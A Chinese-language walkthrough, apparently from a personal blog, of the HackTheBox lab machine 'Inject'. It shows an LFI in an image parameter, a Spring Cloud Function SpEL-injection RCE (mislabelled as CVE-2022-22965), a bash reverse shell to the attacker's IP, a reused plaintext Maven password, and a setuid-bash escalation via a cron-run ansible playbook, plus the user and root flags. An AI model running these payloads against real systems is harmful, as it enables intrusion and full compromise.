injecte靶机
n3ym4r
  2023-03-23 08:09:00 2023-03-23 08:09   2023-03-23 08:19:49    1.8k 字  10 分钟

这个靶机是HTB近期新出的靶机,整体流程为利用web端lfi漏洞读取文件,发现web服务版本及现有的rce漏洞,利用rce拿到shell,查看信息,发现另一个用户phil的明文密码,登录phil用户,拿到user flag,再通过pspy64找到一个可控的计划任务,进行提权,拿到root flag。

image

nmap扫描

┌──(n3ym4r㉿kali)-[~]
└─$ nmap 10.10.11.204                             
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-23 13:20 CST
Nmap scan report for 10.10.11.204
Host is up (0.86s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 96.38 seconds

┌──(n3ym4r㉿kali)-[~]
└─$ nmap -p22,8080 -sC -sV 10.10.11.204
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-23 13:23 CST
Nmap scan report for 10.10.11.204
Host is up (0.40s latency).

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 caf10c515a596277f0a80c5c7c8ddaf8 (RSA)
|   256 d51c81c97b076b1cc1b429254b52219f (ECDSA)
|_  256 db1d8ceb9472b0d3ed44b96c93a7f91d (ED25519)
8080/tcp open  nagios-nsca Nagios NSCA
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.08 seconds

开放了22、8080端口,访问8080web服务

web服务

image

右上角有一个上传文件按钮,是一个图片上传点

随便上传一张图片,抓包看看

image

上传成功后,点击查看图片,url中

GET /show_image?img=Fpq6zvOWYAIT2EU.jpeg HTTP/1.1
Host: 10.10.11.204:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://10.10.11.204:8080/upload
Upgrade-Insecure-Requests: 1

bp抓包,可以看到url中会有个img参数去访问我们刚刚上传的图片

LFI漏洞

那么,这里就会想到lfi,看是否能包含到本地其他文件

image

经过多次尝试往回找寻六次目录即可到达根目录下,查看到etc/passwd文件

尝试读取网站源码

一层一层查找,在WebApp下查看到pom.xml文件

image

注意右边回显

        <dependency>
            <groupId>org.springframework.cloud</groupId>
            <artifactId>spring-cloud-function-web</artifactId>
            <version>3.2.2</version>
        </dependency>

可以看到使用了一个3.2.2版本的Spring Cloud Function

CVE 2022-22965漏洞利用

谷歌一下此版本存在CVE 2022-22965漏洞

https://sysdig.com/blog/cve-2022-22963-spring-cloud/

https://github.com/darryk10/CVE-2022-22963

关于利用,链接写的很明了,我们可以使用curl发包,也可以使用bp

准备一个简单的反弹shell

┌──(n3ym4r㉿kali)-[~]
└─$ cat rev.sh    
#!/bin/bash
/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.16.12/4444 0>&1'

开一个监听

┌──(n3ym4r㉿kali)-[~]
└─$ nc -nvlp 4444            
listening on [any] 4444 ...

开一个web服务,以提供靶机下载

┌──(n3ym4r㉿kali)-[~]
└─$ python -m http.server 80  
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.204 - - [23/Mar/2023 13:53:07] "GET /rev.sh HTTP/1.1" 200 -

靶机下载sh

┌──(n3ym4r㉿kali)-[~]
└─$ curl -i -s -k -X 'POST'  --data-raw 'data' -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("wget 10.10.16.12/rev.sh -O /tmp/rev.sh")' 'http://10.10.11.204:8080/functionRouter'
HTTP/1.1 500 
Transfer-Encoding: chunked
Connection: keep-alive
Content-Type: application/json
Date: Thu, 23 Mar 2023 06:20:24 GMT
Keep-Alive: timeout=4
Proxy-Connection: keep-alive

{"timestamp":"2023-03-23T06:20:24.597+00:00","status":500,"error":"Internal Server Error","message":"EL1001E: Type conversion problem, cannot convert from java.lang.ProcessImpl to java.lang.String","path":"/functionRouter"}

执行rev.sh

┌──(n3ym4r㉿kali)-[~]
└─$ curl -i -s -k -X 'POST'  --data-raw 'data' -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("/bin/bash /tmp/rev.sh")' 'http://10.10.11.204:8080/functionRouter'
HTTP/1.1 500 
Transfer-Encoding: chunked
Connection: keep-alive
Content-Type: application/json
Date: Thu, 23 Mar 2023 06:21:41 GMT
Keep-Alive: timeout=4
Proxy-Connection: keep-alive

{"timestamp":"2023-03-23T06:21:41.414+00:00","status":500,"error":"Internal Server Error","message":"EL1001E: Type conversion problem, cannot convert from java.lang.ProcessImpl to java.lang.String","path":"/functionRouter"}

得到反弹shell

┌──(n3ym4r㉿kali)-[~]
└─$ nc -nvlp 4444            
listening on [any] 4444 ...
connect to [10.10.16.12] from (UNKNOWN) [10.10.11.204] 59054
bash: cannot set terminal process group (801): Inappropriate ioctl for device
bash: no job control in this shell
frank@inject:/$ whoami
whoami
frank
frank@inject:/$ id
id
uid=1000(frank) gid=1000(frank) groups=1000(frank)

提权

frank@inject:/$ ls
ls
bin
boot
dev
etc
home
lib
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
frank@inject:/$ cd home	
cd home
frank@inject:/home$ ls -la
ls -la
total 16
drwxr-xr-x  4 root  root  4096 Feb  1 18:38 .
drwxr-xr-x 18 root  root  4096 Feb  1 18:38 ..
drwxr-xr-x  5 frank frank 4096 Feb  1 18:38 frank
drwxr-xr-x  3 phil  phil  4096 Mar 23 06:12 phil
frank@inject:/home$ cd frank
cd frank
frank@inject:~$ ls -la
ls -la
total 28
drwxr-xr-x 5 frank frank 4096 Feb  1 18:38 .
drwxr-xr-x 4 root  root  4096 Feb  1 18:38 ..
lrwxrwxrwx 1 root  root     9 Jan 24 13:57 .bash_history -> /dev/null
-rw-r--r-- 1 frank frank 3786 Apr 18  2022 .bashrc
drwx------ 2 frank frank 4096 Feb  1 18:38 .cache
drwxr-xr-x 3 frank frank 4096 Feb  1 18:38 .local
drwx------ 2 frank frank 4096 Feb  1 18:38 .m2
-rw-r--r-- 1 frank frank  807 Feb 25  2020 .profile
frank@inject:~$ cd .m2
cd .m2
frank@inject:~/.m2$ ls
settings.xml
frank@inject:~/.m2$ cat settings.xml
cat settings.xml
<?xml version="1.0" encoding="UTF-8"?>
<settings xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
  <servers>
    <server>
      <id>Inject</id>
      <username>phil</username>
      <password>DocPhillovestoInject123</password>
      <privateKey>${user.home}/.ssh/id_dsa</privateKey>
      <filePermissions>660</filePermissions>
      <directoryPermissions>660</directoryPermissions>
      <configuration></configuration>
    </server>
  </servers>
</settings>
frank@inject:~/.m2$

在home/frank目录下的.m2/setting.xml文件看到phil用户的明文密码为DocPhillovestoInject123

切换到phil用户

bash-5.0$ su - phil
su - phil
Password: DocPhillovestoInject123
whoami
phil
pwd
/home/phil
id
uid=1001(phil) gid=1001(phil) groups=1001(phil),50(staff)
ls
pspy64
user.txt
cat user.txt
814beeeaca90583b280d5130c699eb4c

拿到user flag

上传一个pspy64,查看正在运行的服务,可以看到有一个在目录 /opt/automation/tasks 上执行 ansible-parallel的任务,此任务会执行/opt/automation/tasks/目录下的所有.yml文件,我们可以写入一个恶意.yml文件,使其执行

2023/03/23 07:08:01 CMD: UID=0     PID=6173   | /usr/bin/python3 /usr/local/bin/ansible-parallel /opt/automation/tasks/playbook_1.yml 
2023/03/23 07:08:01 CMD: UID=0     PID=6172   | sleep 10 
2023/03/23 07:08:01 CMD: UID=0     PID=6171   | /bin/sh -c /usr/local/bin/ansible-parallel /opt/automation/tasks/*.yml

https://gtfobins.github.io/gtfobins/ansible-playbook/#shell

在此链接看到利用方式

TF=$(mktemp)
echo '[{hosts: localhost, tasks: [shell: /bin/sh </dev/tty >/dev/tty 2>/dev/tty]}]' >$TF
ansible-playbook $TF

echo '[{hosts: localhost, tasks: [shell: /usr/bin/chmod +s /bin/bash]}]' >> /opt/automation/tasks/escalate.yml
whoami
phil
bash -p

ls -la /bin/bash
-rwsr-sr-x 1 root root 1183448 Apr 18  2022 /bin/bash
/bin/bash -p
id
uid=1001(phil) gid=1001(phil) euid=0(root) egid=0(root) groups=0(root),50(staff),1001(phil)
whoami
root
cd root
ls  
/bin/bash: line 3: cd: root: No such file or directory
pspy64
user.txt
cd /root
ls
playbook_1.yml
root.txt
cat root.txt
b1e8275be264df7aab57f5551b986580

拿到root flag

  • 本文标题:injecte靶机
  • 本文作者:n3ym4r
  • 创建时间:2023-03-23 08:09:00
  • 本文链接:https://n3ym4r.github.io/2023/03/23/HTB-inject/
  • 版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!